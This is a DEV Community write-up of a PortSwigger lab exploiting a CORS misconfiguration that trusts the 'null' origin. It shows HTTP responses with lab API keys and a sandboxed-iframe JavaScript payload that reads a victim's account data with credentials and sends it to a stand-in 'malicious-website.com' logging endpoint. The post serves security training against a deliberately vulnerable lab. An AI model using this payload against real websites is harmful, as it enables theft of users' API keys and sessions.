DEV Community

Cover image for Portswigger’s lab write up: CORS vulnerability with trusted null origin
Christian Paez
Christian Paez

Posted on • Updated on

Portswigger’s lab write up: CORS vulnerability with trusted null origin

In this apprentice-level lab, we will exploit a website with a CORS vulnerability that trusts the "null" origin to obtain a user's private credentials.


Upon logging in with the given credentials, we visit the account details page and check the response headers of the request to /accountDetails that fetches the user's API key:

HTTP/1.1 200 OK
Access-Control-Allow-Credentials: true
Content-Type: application/json; charset=utf-8
Connection: close
Content-Length: 149

{
  "username": "wiener",
  "email": "",
  "apikey": "JQ7ufLKKzNoI4ahWKAKWBG5eP64wgwJW",
  "sessions": [
    "cdmflpOO6psYIp3novWUytbSDM9i68X1"
  ]
}

Enter fullscreen mode Exit fullscreen mode

We can see that the Access-Control-Allow-Credentials: true is present, let's try to duplicate this request and change the Origin header to something like Origin: <https://example.com> and see if this value is reflected, the resulting response will be something like this:

HTTP/1.1 200 OK
Access-Control-Allow-Credentials: true
Content-Type: application/json; charset=utf-8
Connection: close
Content-Length: 149

{
  "username": "wiener",
  "email": "",
  "apikey": "JQ7ufLKKzNoI4ahWKAKWBG5eP64wgwJW",
  "sessions": [
    "cdmflpOO6psYIp3novWUytbSDM9i68X1"
  ]
}

Enter fullscreen mode Exit fullscreen mode

The Origin set in the request headers is not present in the Access-Control-Allow-Origin response headers, this could mean that the server does not have CORS vulnerabilities, let's try setting the Origin header to null :

HTTP/1.1 200 OK
Access-Control-Allow-Origin: null
Access-Control-Allow-Credentials: true
Content-Type: application/json; charset=utf-8
Connection: close
Content-Length: 149

{
  "username": "wiener",
  "email": "",
  "apikey": "JQ7ufLKKzNoI4ahWKAKWBG5eP64wgwJW",
  "sessions": [
    "cdmflpOO6psYIp3novWUytbSDM9i68X1"
  ]
}

Enter fullscreen mode Exit fullscreen mode

The null Origin set in the request headers is present in the Access-Control-Allow-Origin response headers, this confirms us that this request has a CORS vulnerability via null origin, let's use the reading material's sandboxed iframe template to craft our exploit so that the request is sent with the Origin header set to null:

<html>
<iframe sandbox='allow-scripts allow-top-navigation allow-forms' src=\"data:text/html<script>,
var req = new XMLHttpRequest();
req.onload = reqListener;
req.open('get','https://vulnerable-website.com/sensitive-victim-data',true);
req.withCredentials = true;
req.send();

function reqListener() {
   location='//malicious-website.com/log?key='+encodeURIComponent(this.responseText);
};
</script>\"></iframe>
</html>

Enter fullscreen mode Exit fullscreen mode

Note: The finished exploit markdown template could not be published here because the editor did not accept it as valid, if you need to see the entire solution go to one of our other sources: https://artofcode.tech/portswiggers-lab-write-up-cors-vulnerability-with-trusted-null-origin/
Github: https://github.com/christianpaez/portswigger/tree/main/labs/apprentice/cors/cors-vulnerability-with-trusted-null-origin

Top comments (0)